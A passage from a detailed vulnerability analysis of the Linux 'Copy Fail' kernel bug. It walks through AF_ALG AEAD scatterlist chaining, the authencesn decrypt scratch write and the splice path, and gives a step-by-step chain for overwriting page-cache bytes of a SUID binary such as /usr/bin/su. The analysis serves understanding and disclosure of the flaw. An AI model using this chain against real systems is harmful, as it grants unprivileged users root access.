} else ...At this stage, RX contains AAD || plaintext and also has room for the authentication tag. The tag is not generated by af_alg_pull_tsgl() at step 2; it is produced later when the prepared request is submitted through crypto_aead_encrypt():
/*
* Later:
* submit the prepared AEAD request.
*
* In the encryption case, the algorithm transforms plaintext into
* ciphertext and writes the authentication tag into the RX destination.
*/
crypto_aead_encrypt(&areq->cra_u.aead_req);Conceptually:
encryption sgl setup
══════════════════════════════════════════════════════
TX SGL RX SGL
┌─────────┬───────────┐ copy ┌───────┬───────────┬───────────┐
│ AAD │ plaintext │ ──────▶ │ AAD │ plaintext │ tag space │
└─────────┴───────────┘ └───────┴───────────┴───────────┘
│ later becomes
│ │ │
│ │ │ written by
│ │ encrypt │ crypto_aead_encrypt()
│ ▼ ▼
│ ciphertext tag
│ ▲
▼ │
AAD │
│ │
└──── authenticated ────┘So the encryption path is straightforward: copy AAD || plaintext from TX into RX, consume the copied TX entries, then let the AEAD algorithm produce ciphertext || tag in the RX destination.
3.3.4.3 Decryption Request Layout
Decryption is the security-sensitive case.
For decryption, the input layout is:
AAD || ciphertext || tagbut the legitimate output layout is only:
AAD || plaintextThe tag is required for authentication, but it must not be emitted as output. That creates the layout problem: the crypto request still needs the tag as input, while the destination should end before the tag.
The decrypt branch in _aead_recvmsg() solves this by copying the output-sized head into RX, preserving the TX tag tail, and chaining that tag tail after RX:
} else {
/*
* Decryption operation - To achieve an in-place cipher
* operation, the following SGL structure is used:
*
* TX SGL: AAD || CT || Tag
* | | ^
* | copy | | Create SGL link.
* v v |
* RX SGL: AAD || CT ----+
*/
/*
* Step 1:
* Copy only the decrypt output-sized prefix from TX into RX.
*
* TX contains: AAD || CT || Tag
* RX receives only: AAD || CT
*
* The tag is intentionally not copied into RX output.
*/
err = crypto_aead_copy_sgl(
null_tfm,
tsgl_src, // source: queued TX input
areq->first_rsgl.sgl.sgt.sgl, // destination: RX output
outlen // copy only AAD || CT
);
if (err)
goto free;
/*
* Step 2:
* Count how many TX scatterlist entries cover the tag tail.
*
* processed = total TX input length
* processed - as = start offset of authentication tag
*/
areq->tsgl_entries = af_alg_count_tsgl(
sk,
processed,
processed - as
);
...
/*
* Step 3:
* Preserve the tag tail from the TX.
*
* The tag remains available as decrypt input, but it is not
* copied into the RX output buffer.
*/
af_alg_pull_tsgl(
sk,
processed,
areq->tsgl, // stores preserved TX tag entries
processed - as // start of tag region
);
...
/*
* Step 4:
* Chain the preserved TX tag entries after the RX scatterlist.
*
* Before:
*
* RX SGL: [ AAD || CT ]
*
* TX SGL: [ AAD || CT || Tag ]
* ^
* |
* preserved tag tail
*
* After sg_chain():
*
* request SGL:
*
* [ RX: AAD || CT ] ---> [ TX: Tag ]
*
* The tag remains input material, but it is now linked after
* the RX-side scatterlist as part of one logical chain.
*/
sg_chain(
sg, // RX scatterlist segment to extend
sgl_prev->sgt.nents + 1, // number of RX entries including chain slot
areq->tsgl // preserved TX tag scatterlist
);
}The three relevant values are:
processed = total queued TX input length
as = AEAD authentication tag size
outlen = processed - asSo for decryption:
outlen = AAD length + ciphertext length
= valid decrypt output - sized prefixThe preserved tag begins at:
processed - asThat means _aead_recvmsg() builds two pieces:
RX head
recvmsg() destination
contains output-sized prefix:
AAD || ciphertext
TX tag tail
preserved sendmsg() tail
contains authentication tagAfter sg_chain(), those pieces are no longer isolated. The RX scatterlist is extended so that walking past its end reaches the preserved TX tag entries:
decrypt request scatterlist
═════════════════════════════════════════════════════════════════════
valid output-sized head preserved input tail
┌────────────────────────────┐ ┌────────────────────────────┐
│ RX SGL │ │ TX tag SGL │
│ recvmsg() destination │ ──────▶ │ authentication tag bytes │
│ AAD || ciphertext │ sg_next │ from sendmsg() │
└────────────────────────────┘ └────────────────────────────┘During actual decryption, the AAD || ciphertext region becomes the valid AAD || plaintext output. The chained TX tag tail remains input material for authentication:
semantic decrypt layout
═════════════════════════════════════════════════════════════════════
valid decrypt output preserved input-only tag
┌────────────────────────────┐ ┌────────────────────────────┐
│ AAD || plaintext │ ──────▶ │ tag │
│ belongs to RX output │ sg_next │ belongs to TX input │
└────────────────────────────┘ └────────────────────────────┘This design is intentional: AEAD decryption still needs the tag, but the tag is not part of the output returned to userspace.
The security-sensitive part is the chain boundary. Once RX and the preserved TX tag tail are chained, a scatterlist walker can cross from the valid output region into the tag entry:
valid decrypt output ends
│
▼
┌────────────────────┐ ┌──────────────────────────┐
│ RX SGL │───────▶ │ preserved TX tag SGL │
│ AAD || plaintext │ sg_next │ authentication tag bytes │
└────────────────────┘ └──────────────────────────┘
^
can we overflow from here?At this point, chaining alone is not the bug. The chain becomes dangerous only if later code performs a destination-side write at the boundary where the valid decrypt output ends — that is the buggy AEAD implementation authencesn introduced in the next 3.4 section.
3.3.4.4 Final AEAD Request Wiring
Before entering the selected AEAD implementation, _aead_recvmsg() stores the prepared scatterlist layout into the final struct aead_request.
Two helpers do the wiring.
aead_request_set_crypt() assigns the input/output scatterlists, payload length, and IV:
static inline void aead_request_set_crypt(struct aead_request *req,
struct scatterlist *src,
struct scatterlist *dst,
unsigned int cryptlen, u8 *iv)
{
req->src = src;
req->dst = dst;
req->cryptlen = cryptlen;
req->iv = iv;
}aead_request_set_ad() stores the AAD length:
static inline void aead_request_set_ad(struct aead_request *req,
unsigned int assoclen)
{
req->assoclen = assoclen;
}In _aead_recvmsg(), the final request is initialized like this:
/* Initialize the crypto operation */
aead_request_set_crypt(
&areq->cra_u.aead_req, // AEAD request object being prepared
rsgl_src, // source SGL:
// logical AEAD input
// aka: AAD || ciphertext || tag
areq->first_rsgl.sgl.sgt.sgl, // destination SGL:
// recvmsg-side output buffer
// aka: AAD || plaintext
used, // cryptlen:
// crypto payload length excluding AAD
// aka: ciphertext || tag length
ctx->iv // IV / nonce for AEAD operation
);
aead_request_set_ad(
&areq->cra_u.aead_req, // same AEAD request object
ctx->aead_assoclen // assoclen: length of AAD prefix
);So the assignment is:
&areq->cra_u.aead_req -> req
rsgl_src -> req->src
areq->first_rsgl.sgl.sgt.sgl -> req->dst
used -> req->cryptlen
ctx->iv -> req->iv
ctx->aead_assoclen -> req->assoclen_aead_recvmsg() builds an in-place decrypt request:
req->src:- AEAD input
AAD || ciphertext || tag
req->dst:- AEAD output
AAD || plaintext
To make that work, _aead_recvmsg() reuses the RX head and links the preserved TX tag tail after it:
AEAD decrypt request
════════════════════════════════════════════════════════════
shared RX head preserved TX tail
┌──────────────────────┐ ┌────────────────┐
req->src ──▶ │ AAD || ciphertext │ ───────▶ │ tag │
└──────────────────────┘ └────────────────┘
▲
│
req->dst ────────────────┘
writes output here:
AAD || plaintextSo the same RX head participates in two views:
req->src reads:
RX head || TX tag tail
AAD || ciphertext || tag
req->dst writes:
RX head only
AAD || plaintextVisually:

The valid decrypt output ends inside the RX head:
RX head
┌────────────┬────────────────────┐
│ AAD │ plaintext │
└────────────┴────────────────────┘
▲
│
valid output boundaryBut the chained request still has a next entry after that boundary:
RX head preserved TX tail
┌────────────┬────────────────┐ ┌────────────┐
│ AAD │ plaintext area │ │ tag │
└────────────┴────────────────┘ └────────────┘
▲ ▲
│ │
valid output ends reachable through sg_next()That is the key idea: _aead_recvmsg() hands the next AEAD layer a normal-looking struct aead_request, but internally the request carries a chained scatterlist layout. The valid decrypt output is supposed to stop at AAD || plaintext, while the authentication tag remains reachable after that boundary as preserved input material.
This layout is not automatically a bug. It becomes dangerous only if a later AEAD implementation performs a destination-side write at the decrypt output boundary. In that case, scatterwalk may follow the chain into the preserved tag entry. If that entry is backed by a pipe/page-cache page, the write can become a page-cache overwrite primitive.
That is why the next layer matters. The selected AEAD implementation, authencesn(), decides whether this chained request layout stays harmless or turns into a boundary-crossing scratch write.
3.4 Authencesn Decrypt Path
Now we know the AEAD request has two views:
- semantic output view: output stops after
AAD || plaintext - scatterlist stream view: RX head is followed by the preserved TX tag tail
At this point, the layout itself is not the bug. The critical question is whether the selected AEAD implementation performs a destination-side write at the boundary where the valid decrypt output ends.
That means we want an OOB write on a logical buffer in attacker perspective.
For Copy Fail, userspace selected:
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))",So the next step is to follow the prepared decrypt request into the selected authencesn implementation.
3.4.1 AEAD Decrypt Callback Dispatch
After _aead_recvmsg() prepares the AEAD request, it submits the operation according to the direction recorded earlier through sendmsg():
ctx->enc ? crypto_aead_encrypt(&areq->cra_u.aead_req) :
crypto_aead_decrypt(&areq->cra_u.aead_req);For Copy Fail, the relevant branch is decryption through crypto_aead_decrypt():
/**
* crypto_aead_decrypt() - decrypt ciphertext
* @req: reference to the aead_request handle that holds all information
* needed to perform the cipher operation
*
* Decrypt ciphertext data using the aead_request handle. That data structure
* and how it is filled with data is discussed with the aead_request_*
* functions.
*
* ...
*/
int crypto_aead_decrypt(struct aead_request *req);crypto_aead_decrypt() is still generic crypto API glue. It resolves the concrete AEAD transform from the request, finds the registered algorithm callbacks, and dispatches into the selected decrypt implementation:
int crypto_aead_decrypt(struct aead_request *req)
{
/*
* Resolve the concrete AEAD transform from the request.
*
* In this case, the transform was selected earlier through:
* salg_name = "authencesn(hmac(sha256),cbc(aes))"
*/
struct crypto_aead *aead = crypto_aead_reqtfm(req);
/*
* Resolve the algorithm implementation behind that transform.
*
* This gives access to the registered callbacks:
* alg->encrypt
* alg->decrypt
*/
struct aead_alg *alg = crypto_aead_alg(aead);
...
/*
* Dispatch into the concrete AEAD decrypt implementation.
*
* For authencesn(hmac(sha256),cbc(aes)), this becomes:
* crypto_authenc_esn_decrypt(req)
*/
else
ret = alg->decrypt(req); // [!] transition
return ret;
}For the selected transform:
.salg_name = "authencesn(hmac(sha256),cbc(aes))"the crypto core instantiates the authencesn AEAD template. During setup, crypto_authenc_esn_create() wires the callbacks:
inst->alg.encrypt = crypto_authenc_esn_encrypt;
inst->alg.decrypt = crypto_authenc_esn_decrypt;So the generic dispatch collapses into:
crypto_aead_decrypt(req)
|
v
alg->decrypt(req)
|
v
crypto_authenc_esn_decrypt(req)The full path from the operation socket is:
recvmsg(opfd, ...)
|
v
_aead_recvmsg()
|
| prepared struct aead_request
| req->src
| req->dst
| req->cryptlen
| req->assoclen
| req->iv
v
crypto_aead_decrypt(req)
|
v
alg->decrypt(req)
|
v
crypto_authenc_esn_decrypt(req)No overwrite has happened yet. This section only proves the dispatch path:
AF_ALG recvmsg()
|
v
generic AEAD request submission
|
v
authencesn decrypt callbackNow the target is precise after the AEAD request being disected in 3.3.4.4: inspect what crypto_authenc_esn_decrypt(req) does with req->src, req->dst, req->assoclen, and req->cryptlen.
3.4.2 The Destination-Side Scratch Writes
Inside crypto_authenc_esn_decrypt(), the decrypt path reads from and writes into the request scatterlists through scatterwalk_map_and_copy() (for walker mechanism see 3.3.3.4).
The relevant pattern in crypto_authenc_esn_decrypt() where frequently calls the scatterlist walker:
static int crypto_authenc_esn_decrypt(struct aead_request *req)
{
unsigned int authsize = crypto_aead_authsize(authenc_esn);
unsigned int assoclen = req->assoclen;
unsigned int cryptlen = req->cryptlen;
struct scatterlist *dst = req->dst; // [!] dst is a chained scatterlist
u32 tmp[2];
/*
* req->cryptlen originally includes:
*
* ciphertext || tag
*
* After this subtraction, cryptlen means:
*
* ciphertext length only
*/
cryptlen -= authsize;
...
/*
* Read the authentication tag from:
*
* req->src at logical offset assoclen + cryptlen
*
* Direction flag out = 0 means:
* scatterlist -> local buffer
*/
scatterwalk_map_and_copy(
ihash,
req->src,
assoclen + cryptlen,
authsize,
0
);
/*
* Read the first 8 bytes of dst into tmp.
*/
scatterwalk_map_and_copy(
tmp,
dst,
0,
8,
0 // read flag: dst -> tmp
);
/*
* Scratch write #1:
* write tmp[0] into dst at logical offset 4.
*/
scatterwalk_map_and_copy(
tmp,
dst,
4,
4,
1 // write flag: tmp -> dst @ 4
);
/*
* Scratch write #2:
* write tmp[1] into dst at logical offset:
*
* assoclen + cryptlen
*/
scatterwalk_map_and_copy(
tmp + 1,
dst,
assoclen + cryptlen,
4,
1 // write flag: tmp+1 -> dst @ assoclen+cryptlen
);
...
}The last argument to scatterwalk_map_and_copy() is the direction flag:
out = 0→ read from scatterlist into local bufferout = 1→ write from local buffer into scatterlist
So these two calls are destination-side writes:
scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1); // [!] bugThe value flow is already visible here:
first 8 bytes of dst
dst[0:8]
│
▼
tmp[0] = AAD[0:4]
tmp[1] = AAD[4:8]
│
▼
tmp + 1 becomes the source of the Scratch write #2Because dst starts at the RX head, and the RX head begins with AAD, this becomes:
tmp[0] = AAD[0:4]
tmp[1] = AAD[4:8]So AAD[4:8] is not magic. It is first read into tmp[1], then later written back through the tmp + 1 scatterwalk write.
Before treating that second write as dangerous, we need to understand why authencesn performs this shuffle at all.
3.4.3 Authencesn ESN Shuffle
authencesn exists for IPsec Extended Sequence Number handling. In this mode, the associated data begins with sequence-number material split into two 32-bit halves:
AAD prefix
┌────────────┬────────────┐
│ seqno_hi │ seqno_lo │
│ 4 bytes │ 4 bytes │
└────────────┴────────────┘During decrypt, authencesn() temporarily rearranges this material before authentication. The three scatterwalk_map_and_copy() calls from the previous section implement that shuffle:
/* Move high-order bits of sequence number to the end. */
scatterwalk_map_and_copy(tmp, dst, 0, 8, 0); // read
scatterwalk_map_and_copy(tmp, dst, 4, 4, 1); // scratch write #1
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1); // scratch write #2 [!]Read as operations:
- read 8 bytes from logical offset 0 in
dstintotmp - write 4 bytes back into
dstat logical offset 4 - write 4 bytes into
dstat logical offsetassoclen + cryptlen
Visually the read/write operations are:
ESN scratch-write layout
════════════════════════════════════════════════════════════
Step 1: read first 8 bytes from dst into tmp
dst starts at RX head
┌────────────┬────────────┬────────────────────┐
│ AAD[0:4] │ AAD[4:8] │ ciphertext / data │
└────────────┴────────────┴────────────────────┘
│ │
▼ ▼
┌────────────┬────────────┐
│ tmp[0] │ tmp[1] │
│ AAD[0:4] │ AAD[4:8] │
└────────────┴────────────┘
│
│ as the source of write
▼
Scratch write #1
════════════════
scatterwalk_map_and_copy(tmp, dst, 4, 4, 1)
dst
┌────────────┬────────────┬────────────────────┐
│ AAD[0:4] │ write here │ ciphertext / data │
└────────────┴────────────┴────────────────────┘
▲
│
logical offset 4
local AAD-area write tmp[0] == AAD[0:4]
Scratch write #2
════════════════
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1)
dst logical stream
┌────────────┬────────────────────┐ ┌────────────────────┐
│ AAD │ plaintext/output │ │ chained tag entry │
└────────────┴────────────────────┘ └────────────────────┘
▲
│
offset assoclen + cryptlen
write tmp[1] == AAD[4:8]
└─────────────── sgl chained by sg_next() ────────────────┘The first write is local, staying near the AAD/ESN area:
tmp[0] -> dst @ 4 The second write is the pivot:
tmp[1] -> dst @ assoclen + cryptlen Here tmp[1] comes from AAD[4:8], but the destination is no longer a fixed ESN-local offset. It is a calculated AEAD boundary.
If dst were one flat private output buffer, this might still look like ordinary scratch space. But dst is a scatterlist chain, and _aead_recvmsg() may place a preserved TX tag entry after the valid RX output head.
So the value side is already clear:
AAD[4:8]->tmp[1]-> scratch-write source
The next question is the destination side — the chained tag sg entry:
Where does logical offset
assoclen + cryptleninsidedstactually land?
That boundary is what we dissect next.
3.4.4 Decrypt-boundary Write Offset
That final scratch write above is the critical one:
scatterwalk_map_and_copy(
tmp + 1, // source: AAD[4:8] staged in tmp[1]
dst, // target scatterlist
assoclen + cryptlen, // logical destination offset
4, // 4-byte write
1 // write flag: tmp+1 -> scatterlist
);The important detail is that crypto_authenc_esn_decrypt() first removes the authentication tag from cryptlen:
cryptlen -= authsize;So by the time the scratch write runs, cryptlen no longer means ciphertext || tag. It means ciphertext length only.
Therefore, the argument, start offset, for that 2nd scratch write becomes:
assoclen + cryptlenpoints to the boundary immediately after:
AAD || ciphertextFor AEAD decryption, ciphertext and plaintext have the same length, so this is also the boundary after the legitimate output:
assoclen + ciphertext_len == assoclen + plaintext_len The boundary looks like this:
AEAD decrypt boundary
══════════════════════════════════════════════════════════════
decrypt input:
┌────────────┬────────────────────┬────────────┐
│ AAD │ ciphertext │ tag │
└────────────┴────────────────────┴────────────┘
0 assoclen assoclen+cryptlen
│
│
preserved tag
│
│
│
valid decrypt output: ▼
┌────────────┬────────────────────┐ ┌────────────┐
│ AAD │ plaintext │ │ chained tag│
└────────────┴────────────────────┘ └────────────┘
0 assoclen assoclen+plaintext_len
▲
│
valid output ends here
│
▼
authencesn 4-byte scratch write starts here
└────────── sgl chained by sg_next() ───────────┘As established in 3.3.4.4, the final decrypt request can be built as a scatterlist chain: a valid RX output head followed by a preserved TX tag tail.
Those entries are not physically contiguous, and they are not adjacent virtual-memory regions in the normal userspace sense. But to scatterwalk, they form one logical byte stream. Once the walker reaches the end of one scatterlist entry, it can continue through sg_next() into the next entry.
That is why the scratch write has an overflow-style shape:
- value:
AAD[4:8] - write source:
tmp + 1 - write destination:
dst @ assoclen + cryptlen - semantic meaning: exact end of valid decrypt output
- scatterlist meaning: continue into the next chained entry if one exists
More precisely:
authencesnwritesAAD[4:8]as 4 bytes at the end of the valid decrypt output region, andscatterwalkcan carry that write into the next chained scatterlist entry.
At this point, we have proven the algorithm-side write. We have not yet proven that the next chained entry is page-cache-backed. That bridge comes from the splice path: a file-backed page can enter the AEAD TX side through the pipe-to-socket handoff (see 3.2.4).
Chapter 4 puts those pieces together into the full exploit chain (details starts from 4.3).
4 Vulnerability Anatomy
4.1 Vulnerability Overview
At a high level, this bug lets an unprivileged user modify a few bytes of a root-owned executable "file", even though that file was only supposed to be read, not written.
The trick is that the write does not go through the normal filesystem write path at all. Instead, attacker makes the kernel treat file-backed pages as part of a crypto request, and then relies on a buggy decrypt path to write 4 controlled bytes past, which is the in-memory backing page cache later reused by execve().
So the bug is the opposite of copying, instead:
- the target file page is first borrowed into a pipe by the zero-copy
splice()path, - that page is then reused inside an
AF_ALGAEAD decrypt request, - and the selected buggy
authencesn()decrypt implementation writes 4 bytes into the wrong place.
If the chosen target is a SUID binary such as /usr/bin/su, corrupting its cached executable bytes is enough to turn a decrypt request into local privilege escalation. Even though that request may fail — but it does not matter.
4.2 Copy Fail Exploit Chain
After a deep dive through the Linux kernel, the exploit chain becomes easier to read. Each step below links back to the section where that mechanism was introduced.
- Pick a file-backed executable target whose bytes are served through the page cache. For privilege escalation, the target can be a
root-owned SUID binary such as/usr/bin/su. - Open an
AF_ALGAEAD socket path forauthencesn(hmac(sha256),cbc(aes)), so a laterrecvmsg()reaches the selectedauthencesn()decrypt path. - Use
sendmsg()to queue attacker-controlledAAD. Bytes4..7of that AAD becomeseqno_lo, the 4-byte value later written bycrypto_authenc_esn_decrypt()during the "OOB" scatterlist walk. - Use
splice(file -> pipe)so the pipe holds apipe_bufferreferencing the target file's cached page, rather than a private copied buffer. - Use the
pipe -> socketsplice path so that same pipe-backed page is forwarded throughsplice_to_socket(). Internally, the pipe buffer becomes abio_vec, then a page-backedmsg_itermarked withMSG_SPLICE_PAGES. - On the accepted
AF_ALGoperation socket,af_alg_sendmsg()handles theMSG_SPLICE_PAGESpayload and converts the page-backed iterator into the AEAD TX scatterlist. At this point, the target file's page-cache page has entered the crypto request path. - Let
_aead_recvmsg()build the decrypt request scatterlist: the valid RX output head is backed by the caller's receive buffer, while the preserved TX tag tail can still point at the spliced file-backed page. - Trigger decrypt with
recvmsg(). On theauthencesn()decrypt path, the kernel performs the destination-side scratch write atassoclen + cryptlen. - Because
scatterwalkfollows the chained scatterlist mechanically, that 4-byte write crosses the valid decrypt output boundary and lands in the next chained entry, which is backed by the target file's page-cache page. - The decrypt operation fails authentication and returns an error, but the 4-byte overwrite remains in page cache. A later
execve()of the target binary consumes the corrupted executable bytes.
Chained from the kernel perspective:
Exploit chain
════════════════════════════════════════════════════════════
1. choose target
root-owned SUID executable
e.g. /usr/bin/su
│
▼
2. file page enters pipe
splice(file -> pipe)
pipe_buffer references cached file page
│
▼
3. pipe page enters socket send path
splice(pipe -> socket)
pipe_buffer -> bio_vec -> msg_iter
MSG_SPLICE_PAGES
│
▼
4. page enters AF_ALG TX scatterlist
af_alg_sendmsg()
extract_iter_to_sg()
│
▼
5. attacker-controlled AAD is queued
AAD[4:8] = seqno_lo
4-byte value to be written later
│
▼
6. decrypt request is built
_aead_recvmsg()
RX output head + chained TX tag tail
│
▼
7. authencesn decrypt runs
crypto_authenc_esn_decrypt()
│
▼
8. destination-side scratch write
scatterwalk_map_and_copy(...,
dst,
assoclen + cryptlen,
4,
out = 1)
│
▼
9. scatterwalk follows sg_next()
valid RX output -> chained TX tag entry
│
▼
10. page-cache overwrite
4 attacker-controlled bytes land in cached file page
│
▼
11. later execve()
kernel executes corrupted cached executable bytesIn compact form:
SUID file page →
splice(file -> pipe)→pipe_bufferrefs cached page →splice(pipe -> socket)→msg_iterwithMSG_SPLICE_PAGES→AF_ALGTX scatterlist → TX tag tail chained after RX output → authencesn scratch write @assoclen+cryptlen→ scatterwalk followssg_next()→ 4-byte page-cache overwrite → laterexecve()runs corrupted cached executable bytes
4.3 Vulnerable Execution Path
This section closes the last gap left at the end of Chapter 3. We already proved the algorithm-side write in authencesn(); now we follow one target file page until it becomes the chained TX-side scatterlist entry that sits behind the decrypt boundary.
4.3.1 File-to-pipe Page Installation
The first half of the primitive comes from the regular-file splice() path:
splice()→do_splice()→splice_file_to_pipe()→do_splice_read()→filemap_splice_read()→splice_folio_into_pipe()
The important effect is that splice_folio_into_pipe() creates a struct pipe_buffer that directly references the file-backed page-cache page:
*buf = (struct pipe_buffer) {
.ops = &page_cache_pipe_buf_ops,
.page = page, // cached file page
.offset = offset, // target file offset on page
.len = part,
};So after splice(file -> pipe), the pipe does not hold an anonymous copy of the file data. It holds a pipe-buffer entry pointing at the cached file page itself.
target file offset
|
v
cached file page in page cache (folio/page)
|
v
pipe buffer references that pageThat gives the first half of the primitive:
target file offset -> cached file page -> pipe buffer referenceAt this point, no corruption has happened yet. The only state we have is a file-backed page-cache page represented by a pipe buffer. The next question is how that pipe buffer reaches the AF_ALG request path.
4.3.2 Pipe Page Into TX Scatterlist
The pipe now references a cached file page. The exploit needs that same page reference to become crypto input, so the next step is splice(pipe -> AF_ALG socket).
That handoff happens when pipe data is spliced into the accepted AF_ALG operation socket. In splice_to_socket(), the kernel consumes pipe buffers and describes their backing pages as bio_vec entries, described in fs/splice.c:869-891:
struct pipe_buffer *buf = &pipe->bufs[tail & mask]; // pipe buffer
...
bvec_set_page(
&bvec[bc++],
buf->page, // page referenced by pipe_buffer
seg, // length
buf->offset // offset inside that page
);
...
msg.msg_flags = MSG_SPLICE_PAGES; // [!]
...
ret = sock_sendmsg(sock, &msg);The important part is:
pipe_buffer page
|
v
bio_vec entry
|
v
socket sendmsg with MSG_SPLICE_PAGESSo the page is not copied into a normal userspace buffer. It is carried forward as a page-backed iterator into the socket send path.
For the accepted AF_ALG AEAD socket, sock_sendmsg() dispatches into aead_sendmsg(), which immediately forwards into af_alg_sendmsg():
sock_sendmsg()
|
v
aead_sendmsg()
|
v
af_alg_sendmsg()Inside af_alg_sendmsg(), the exploit-relevant path is selected by MSG_SPLICE_PAGES, described af_alg.c:1040-1061:
static int af_alg_sendmsg(struct socket *sock,
struct msghdr *msg, // sendmsg() message from user space
size_t size,
unsigned int ivsize)
{
...
// msg.msg_flags = MSG_SPLICE_PAGES
if (msg->msg_flags & MSG_SPLICE_PAGES) {
struct sg_table sgtable = {
.sgl = sg, // TX scatterlist
.nents = sgl->cur, // used entries
.orig_nents = sgl->cur,
};
// [!] conversion
plen = extract_iter_to_sg(
&msg->msg_iter, // spliced/page-backed iterator
len,
&sgtable, // append into sg table
MAX_SGL_ENTS - sgl->cur,
0
);
...
for (; sgl->cur < sgtable.nents; sgl->cur++)
get_page(sg_page(&sg[sgl->cur])); // keep page alive
...This is the conversion point:
pipe-backed iterator
|
v
extract_iter_to_sg()
|
v
AF_ALG TX scatterlist entrySo the full bridge is:
cached file page
|
v
pipe buffer references that page
|
v
splice_to_socket()
|
v
MSG_SPLICE_PAGES sendmsg
|
v
af_alg_sendmsg()
|
v
extract_iter_to_sg()
|
v
TX scatterlist entryAt this point, the target file page is no longer only sitting behind a pipe buffer. It has become part of the AEAD request's TX scatterlist. It is still only input, though; the write becomes possible only after _aead_recvmsg() builds the in-place decrypt layout.
file-backed page enters AEAD TX path
═══════════════════════════════════════════════
┌────────────────────────────┐
│ target file page cache │
│ /usr/bin/su @ offset X │
└──────────────┬─────────────┘
│ splice(file -> pipe)
▼
┌────────────────────────────┐
│ pipe buffer │
│ references cached page │
└──────────────┬─────────────┘
│ splice(pipe -> AF_ALG socket)
│ MSG_SPLICE_PAGES
▼
┌────────────────────────────┐
│ AF_ALG TX scatterlist │
│ sg entry references page │
└────────────────────────────┘4.3.3 Chained Decrypt Request Layout
Now the AF_ALG operation socket has both ingredients:
- attacker-controlled
AADsubmitted through the normalsendmsg()path; - file-backed TX scatterlist entries imported through the
MSG_SPLICE_PAGESpath.
_aead_recvmsg() is where those two ingredients are combined. It converts the queued TX state and the caller's RX buffer into the final AEAD decrypt request.
On the decrypt path, the construction happens in three steps:
- copy output-sized prefix: from TX (
AAD || ciphertext || tag) to RX (AAD || ciphertext) - preserve the left-over TX tag tail
tag - chain preserved tag after RX head: RX head → TX tag tail
In code, the important operations are:
crypto_aead_copy_sgl()copies the decrypt output-sized prefix into RX:AAD || ciphertext.af_alg_pull_tsgl()preserves the TX-side tag tail instead of copying it into the RX output region.sg_chain()links that preserved TX tail after the RX head.aead_request_set_crypt()andaead_request_set_ad()wire the finalstruct aead_request.
The final request shape is:
AEAD decrypt request
════════════════════════════════════════════════════
req->src ──▶ RX head ───────────────▶ TX tag tail
[ AAD || ciphertext ] [tag]
req->dst ──▶ RX head
[ AAD || plaintext ]
^
valid output ends hereThe exploit-relevant detail is the TX tag tail:
- preserved input tag region
- chained after the RX output head
- can still be backed by the spliced file page
This is the exact point where the file-backed page imported through the pipe becomes the next scatterlist entry after the valid decrypt output region. The page is now positioned behind the boundary; the remaining missing piece is a write that starts at that boundary.
4.3.4 Authencesn Scratch Write
The previous step leaves us with a decrypt request whose req->dst starts at the RX head, while the preserved TX tag tail is chained immediately after that valid output region. Nothing has been overwritten yet; _aead_recvmsg() has only constructed the shape.
The overwrite happens only when that prepared request is submitted to the selected AEAD implementation. In this path, crypto_aead_decrypt() dispatches the request into crypto_authenc_esn_decrypt(), the decrypt callback for authencesn(hmac(sha256),cbc(aes)).
The exploit-relevant lines are:
cryptlen -= authsize;
...
/*
* Read the first 8 bytes from dst into tmp.
*
* In this request layout, dst starts at the RX head,
* whose first bytes are the AAD.
*/
scatterwalk_map_and_copy(
tmp,
dst,
0,
8,
0 // read flag: scatterlist -> tmp
);
/*
* Write the lower 4 bytes back near the AAD area.
*/
scatterwalk_map_and_copy(
tmp,
dst,
4,
4,
1 // write flag: tmp -> scatterlist
);
/*
* Write the upper 4 bytes at the decrypt boundary.
*
* This is the Copy Fail write.
*/
scatterwalk_map_and_copy(
tmp + 1,
dst,
assoclen + cryptlen,
4,
1 // write flag: tmp -> scatterlist
);The first scatterwalk_map_and_copy() reads 8 bytes from the beginning of dst into tmp. Since req->dst starts at the RX head, and the RX head begins with the AAD, this captures:
tmp
┌────────────┬────────────┐
│ tmp[0] │ tmp[1] │
│ AAD[0:4] │ AAD[4:8] │
└────────────┴────────────┘So the attacker-controlled bytes staged in AAD[4:8] become tmp + 1.
Then authencesn() uses that tmp + 1 pointer as the source of the second scratch write:
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);That gives the value flow:
AAD[4:8] -> read into tmp[1] (tmp+1) -> 4-byte scratch write sourceThe offset side is separate. cryptlen is first reduced by the tag size:
cryptlen -= authsize;So at the time of the write:
cryptlen = ciphertext lengthand the destination offset becomes:
assoclen + cryptlen
= AAD length + ciphertext length
= end of valid decrypt outputTherefore the write operation is:
value = AAD[4:8]
target = dst @ assoclen + cryptlen
size = 4 bytesVisually:
valid decrypt output
┌────────────┬────────────────────┐
│ AAD │ plaintext │
└────────────┴────────────────────┘
^
│
AAD[4:8] is written here as 4 bytesBecause scatterwalk_map_and_copy() walks the destination scatterlist mechanically, the write does not stop just because the AEAD output boundary ends there. If the next scatterlist entry is chained after RX, sg_next() carries the write forward.
In this exploit path, that next entry is the preserved TX tag tail backed by the spliced file page. That completes the bridge from attacker-controlled AAD bytes to a page-cache-backed destination.
4.3.5 Page-cache Overwrite Primitive
Now the two halves meet. The previous step showed the write gadget:
scatterwalk_map_and_copy(
tmp + 1,
dst,
assoclen + cryptlen, // scatterlist walk oob
4, // bytes to write
1 // write flag
);From 4.3.4, the value comes from the AAD:
AAD[4:8] -> tmp + 1 -> 4-byte scratch write sourceBy itself, that is only a 4-byte destination-side scatterlist write. It becomes the Copy Fail primitive because of the request layout built earlier: dst starts at the RX output head, but the scatterlist does not stop there. After the valid decrypt output region, it continues into the preserved TX tag entry.
That preserved TX tag entry came from the spliced pipe path. Earlier, af_alg_sendmsg() imported the MSG_SPLICE_PAGES payload into the AEAD TX scatterlist, so the chained tag entry can still reference the target file's cached page.
Now the primitive is fully assembled:
- WHAT to write:
AAD[4:8]/seqno_lo
- HOW the write happens:
authencesnscratch writescatterwalk_map_and_copy(..., dst, assoclen + cryptlen, 4, out = 1)
- WHERE it lands:
- chained TX tag entry
- spliced file-backed page
So the write path is:
attacker input
──────────────
AAD[4:8] / seqno_lo
│
▼
authencesn scratch write
────────────────────────
scatterwalk_map_and_copy(tmp + 1,
dst,
assoclen + cryptlen,
4,
out = 1)
│
▼
scatterlist crossing
────────────────────
dst output boundary
│
▼
sg_next()
│
